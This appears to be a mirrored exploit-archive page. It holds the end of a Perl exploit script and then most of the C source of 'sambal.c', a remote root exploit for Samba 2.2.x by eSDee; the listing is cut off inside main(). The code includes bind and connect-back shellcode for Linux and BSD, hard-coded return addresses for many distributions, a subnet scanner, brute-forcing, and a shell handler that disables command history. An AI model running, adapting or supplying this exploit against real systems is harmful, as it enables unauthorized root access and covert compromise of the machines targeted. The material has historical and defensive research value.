    my $sel = IO::Select->new($s);
    my $res;
    my @fds = $sel->can_read(4);
    foreach (@fds) { $res .= <$s>; }
    return $res;
}

sub HexDump {
    my ($data) = @_;
    my @x = split(//, $data);
    my $cnt = 0;

    foreach my $h (@x)
    {
        if ($cnt > 16)
        {
            print "\n";
            $cnt = 0;
        }

        printf("\\x%.2x", ord($h));
        $cnt++;
    }
    print "\n";
}

# thank you k2 ;)
sub GetNops {
    my ($cnt) = @_;
    my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
                        "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
                        "\xf5\x45\x4c");
    return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}



# milw0rm.com [2003-04-07]
		

- 漏洞信息 (10)

Samba 2.2.8 Remote Root Exploit - sambal.c (EDBID:10)
linux remote
2003-04-10 Verified
139 eSDee
N/A [点击下载]
/*
    Remote root exploit for Samba 2.2.x and prior that works against 
    Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and 
    OpenBSD (2.x, 3.x and 3.2 non-executable stack). 
    sambal.c is able to identify samba boxes. It will send a netbios
    name packet to port 137. If the box responds with the mac address
    00-00-00-00-00-00, it's probally running samba.
 
    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Scan mode.
    + [192.168.0.3] Samba
    + [192.168.0.10] Windows
    + [192.168.0.20] Windows
    + [192.168.0.21] Samba
    + [192.168.0.30] Windows
    + [192.168.0.31] Samba
    + [192.168.0.33] Windows
    + [192.168.0.35] Windows
    + [192.168.0.36] Windows
    + [192.168.0.37] Windows
    ...
    + [192.168.0.133] Samba

    Great!
    You could now try a preset (-t0 for a list), but most of the 
    time bruteforce will do. The smbd spawns a new process on every 
    connect, so we can bruteforce the return address...

    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Worked!
    --------------------------------------------------------------
  Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586
 i586 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)

sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|

*/
  
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef struct {
        unsigned char type;
        unsigned char flags;
        unsigned short length;
} NETBIOS_HEADER;

typedef struct {
        unsigned char protocol[4];
        unsigned char command;
        unsigned short status;
        unsigned char reserved;
        unsigned char  flags;
        unsigned short flags2;
        unsigned char  pad[12];
        unsigned short tid;
        unsigned short pid;
        unsigned short uid;
        unsigned short mid;
} SMB_HEADER;

int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

char
linux_bindcode[] =
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
bsd_bindcode[] =
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
        "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
        "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
        "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
        "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
        "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
        "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
        "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
        "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
        "\xeb\x9a";

char
linux_connect_back[] =
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80"; 

char
bsd_connect_back[] =
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



struct {
        char *type;
        unsigned long ret;
        char *shellcode;
        int os_type;    /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec 
stack */

} targets[] = {
        { "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode,
0 },
        { "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode,   
 0 },
        { "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode,
0 },
        { "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode,
0 },
        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode,   
 0 },
        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 
0 },
        { "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 
0 },
        { "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 
0 },
        { "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode,
0 },
        { "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode,   
 0 },
        { "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode,  
0 }, 
        { "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode,   
 0 },
        { "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,     
1 },
        { "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,
1 },
        { "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,
1 },
        { "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,     
 1 },
        { "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,
2 },
        { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,     
 2 },
        { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,     
 2 },
        { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,     
 2 },
        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode,
0 },
};

void shell();
void usage();
void handler();

int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 
usage(char *prog)
{
        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
                        "-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/Net
BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
                        "-B <step>       bruteforce steps (default = 300)\n"
                        "-c <ip address> connectback ip address\n"
                        "-C <max childs> max childs for scan/bruteforce mode (d
efault = 40)\n"
                        "-d <delay>      bruteforce/scanmode delay in micro sec
onds (default = 100000)\n"
                        "-f              force\n" 
                        "-p <port>       port to attack (default = 139)\n"
                        "-r <ret>        return address\n"
                        "-s              scan mode (random)\n"
                        "-S <network>    scan mode\n"
                        "-t <type>       presets (0 for a list)\n" 
                        "-v              verbose mode\n\n", prog);
        
        exit(1);
}

int
is_samba(char *ip, unsigned long time_out)
{
        char
        nbtname[]= /* netbios name packet */
        {
                0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
                0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
                0x00,0x01
        };

        unsigned char recv_buf[1024];
        unsigned char *ptr;

        int i = 0;
        int s = 0;

        unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

        if(Connect(s, ip, 137, time_out) == -1) {
                close(s);
                return -1;
        } 

        memset(recv_buf, 0x00, sizeof(recv_buf));

        if(write_timer(s, time_out) == 1) {
                if (write(s, nbtname, sizeof(nbtname)) <= 0) {
                        close(s);
                        return -1;
                }
        }

        if (read_timer(s, time_out) == 1) {
                if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
                        close(s);
                        return -1;
                }

                ptr = recv_buf + 57;
                total = *(ptr - 1); /* max names */

                while(ptr < recv_buf + sizeof(recv_buf)) {
                        ptr += 18;
                        if (i == total) {

                                ptr -= 19;                      

                                if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 &
& *(ptr + 3) == 0x00 &&
                                     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 &
& *(ptr + 6) == 0x00) {
                                        close(s);
                                        return 0;
                                }

                                close(s);
                                return 1;
                        }

                        i++;    
                }

        }
        close(s);
        return -1;
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   connect_read, connect_write;
        struct timeval           timeout;
        int                      getsockopt_length = 0;
        int                      getsockopt_error = 0;
        struct sockaddr_in       server;
        bzero(&server, sizeof(server));
        server.sin_family = AF_INET;
        inet_pton(AF_INET, ip, &server.sin_addr);
        server.sin_port = htons(port);

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                close(fd);
                return -1;
        }
  
        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return -1;
        }
        
        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&connect_read);
        FD_ZERO(&connect_write);
        FD_SET(fd, &connect_read);
        FD_SET(fd, &connect_write);

        if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
                if(errno != EINPROGRESS) {
                        close(fd);
                        return -1;
                }
        }
        else {
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                
                return 1;

        }

        select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti
meout);

        if(select_status == 0) {
                close(fd);
                return -1;

        }

        if(select_status == -1) {
                close(fd);
                return -1;
        }

        if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
                if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
 {
                        getsockopt_length = sizeof(getsockopt_error);

                        if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err
or, &getsockopt_length) < 0) {
                                errno = ETIMEDOUT;
                                close(fd);
                                return -1;
                        }

                        if(getsockopt_error == 0) {
                                if(fcntl(fd, F_SETFL, flags) < 0) {
                                        close(fd);
                                        return -1;
                                }
                                return 1;
                        } 

                        else {
                                errno = getsockopt_error;
                                close(fd);
                                return (-1);
                                }

                        }
                }
        else {
                close(fd);
                return 1;
        }

        if(fcntl(fd, F_SETFL, flags) < 0) {
                close(fd);
                return -1;
        }
        return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   fdread;
        struct timeval           timeout;

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                close(fd);
                return (-1);
        }

        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return (-1);
        }

        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&fdread);
        FD_SET(fd, &fdread);
        select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

        if(select_status == 0) {
                close(fd);
                return (-1);
        }

        if(select_status == -1) {
                close(fd);
                return (-1);
        }
  
        if(FD_ISSET(fd, &fdread)) {
  
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                
                return 1;

        } 
        else {
                close(fd);
                return 1;

        }
}

int
write_timer(int fd, unsigned int time_out)
{

        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   fdwrite;
        struct timeval           timeout;

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
                close(fd);
                return (-1);
        }

        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return (-1);
        }
        
        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&fdwrite);
        FD_SET(fd, &fdwrite);

        select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

        if(select_status == 0) {
                close(fd);
                return -1;
        }

        if(select_status == -1) {
                close(fd);
                return -1;
        }

        if(FD_ISSET(fd, &fdwrite)) {
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                return 1;
        }
        else { 
                close(fd);
                return -1;
        }
}


void 
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE
\";uname -a;id;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }

                usleep(10);
        }

        fprintf(stderr, "Connection lost.\n\n");
        exit(0);
}

void
handler()
{
        int sock = 0;
        int i = 0;
        OWNED = 1;

        for (i = 0; i < 100; i++)
                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                close(sock);
                exit(1);
        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                fprintf(stdout, "+ Worked!\n"
                                "----------------------------------------------
----------------\n");
                shell(sock);
                close(sock);
        }


}

int 
start_session(int sock)
{
        char buffer[1000];
        char response[4096];
        char session_data1[]    = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00
\x00\x00\x00";
        char session_data2[]    = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25
\x6e\x6f\x62\x6f\x64\x79"
                                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24
";

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x2E);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x73;         /* session setup */
        smbheader->flags        = 0x08;         /* caseless pathnames */
        smbheader->flags2       = 0x01;         /* long filenames supported */
        smbheader->pid          = getpid() & 0xFFFF;
        smbheader->uid          = 100;
        smbheader->mid          = 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da
ta1, sizeof(session_data1) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 50, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess
ion message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
        smbheader->pid          = getpid() & 0xFFFF;
        smbheader->tid          = 0x00;
        smbheader->uid          = 100;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da
ta2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

        char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x
00\x00\x00\x00" 
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex
ploit_data), 0x90, 3000);

        buffer[1096] = 0xEB;
        buffer[1097] = 0x70;

        for (i = 0; i < 4 * 24; i += 8) {
                memcpy(buffer + 1099 + i, &dummy, 4);
                memcpy(buffer + 1103 + i, &ret,   4);
        }

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
                        exploit_data, sizeof(exploit_data) - 1);
        memcpy(buffer + 1800, shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex
ploit_data), 0x90, 3000);

        for (i = 0; i < 4 * 24; i += 4)
                memcpy(buffer + 1131 + i, &dummy, 4);

        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode))
;

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


int
main (int argc,char *argv[])
{
        char *shellcode = NULL;
        char scan_ip[256];

        int brute       = -1;
        int connectback = 0;
        int force       = 0;
        int i           = 0;
        int ip1         = 0;
        int ip2         = 0;
        int ip3         = 0;
        int ip4         = 0;
        int opt         = 0;
        int port        = 139;
        int random      = 0;
        int scan        = 0;
        int sock        = 0;
        int sock2       = 0;
        int status      = 0;
        int type        = 0;
        int verbose     = 0;

        unsigned long BRUTE_DELAY       = 100000;
        unsigned long ret               = 0x0;
        unsigned long MAX_CHILDS        = 40;
        unsigned long STEPS             = 300;

        struct hostent          *he;

        fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric
.org|be)\n"
                        "------------------------------------------------------
--------\n");
        
        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
                switch(opt) 
                {
                        case 'b':
                                brute = atoi(optarg);
                                if ((brute < 0) || (brute > 3)) {
                                        fprintf(stderr, "Invalid platform.\n\n"
);
                                        return -1;
                                }
                                break;
                        case 'B':
                                STEPS = atoi(optarg);
                                if (STEPS == 0) STEPS++;
                                break;
                        case 'c':
                                sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3,
 &ip4);
                                connectback = 1;

                                if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 
0) {
                                        fprintf(stderr, "Invalid IP address.\n\
n");
                                        return -1;
                                }

                                linux_connect_back[33] = ip1; bsd_connect_back[
24] = ip1;
                                linux_connect_back[34] = ip2; bsd_connect_back[
25] = ip2;
                                linux_connect_back[35] = ip3; bsd_connect_back[
26] = ip3;
                                linux_connect_back[36] = ip4; bsd_connect_back[
27] = ip4;

                                break;
                        case 'C':
                                MAX_CHILDS = atoi(optarg);
                                if (MAX_CHILDS == 0) {
                                        fprintf(stderr, "Invalid number of chil
ds.\n");
                                        return -1;
                                }

                                if (MAX_CHILDS > 99) {
                                        fprintf(stderr, "Too many childs, using
 99. \n");
                                        MAX_CHILDS = 99;
                                }

                                break;
                        case 'd':
                                BRUTE_DELAY = atoi(optarg);
                                break;
                        case 'f':
                                force = 1;
                                break;
                        case 'p':
                                port = atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr, "Invalid port.\n\n");
                                        return -1;
                                }
                                break;
                        case 'r':
                                ret = strtoul(optarg, &optarg, 16);
                                break;
                        case 's':
                                random  = 1;
                                scan    = 1;
                                break;
                        case 'S':
                                random  = 0;
                                scan    = 1;
                                sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
                                ip3--;
                                break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 16) {
                                        for(i = 0; i < sizeof(targets) / 16; i+
+)
                                                fprintf(stdout, "%02d. %s      
     [0x%08x]\n", i + 1,

                                                                targets[i].type
, (unsigned int) targets[i].ret);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
                        case 'v':
                                verbose = 1;
                                break;
                        default:
                                usage(argv[0] == NULL ? "sambal" : argv[0]);
                                break;
                }

        }

        if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 &&
 scan == 0)) 
                usage(argv[0] == NULL ? "sambal" : argv[0]);

        if (scan == 1) 
                fprintf(stdout, "+ Scan mode.\n");
        if (verbose == 1)
                fprintf(stdout, "+ Verbose mode.\n");

        if (scan == 1) {

                srand(getpid());

                while (1) {

                        if (random == 1) {
                                ip1 = rand() % 255;
                                ip2 = rand() % 255;
                                ip3 = rand() % 255; } 
                        else {
                                ip3++;
                                if (ip3 > 254) { ip3 = 1; ip2++; }
                                if (ip2 > 254) { ip2 = 1; ip1++; }
                                if (ip1 > 254) exit(0);
                        }

                        for (ip4 = 0; ip4 < 255; ip4++) {
                                i++;
                                snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%
u.%u", ip1, ip2, ip3, ip4);
                                usleep(BRUTE_DELAY);

                                switch (fork()) {
                                        case 0:
                                                switch(is_samba(scan_ip, 2)) {
                                                        case 0:
                                                                fprintf(stdout,
 "+ [%s] Samba\n", scan_ip);
                                                                break;
                                                        case 1:
                                                                fprintf(stdout,
 "+ [%s] Windows\n", scan_ip);
                                                                break;
                                                        default:
                                                                break;  
                                                }

                                                exit(0);
                                                break;
                                        case -1:
                                                fprintf(stderr, "+ fork() error
\n");
                                                exit(-1);
                                                break;
                                        default:
                                                if (i > MAX_CHILDS - 2) { 
                                                        wait(&status); 
                                                        i--;
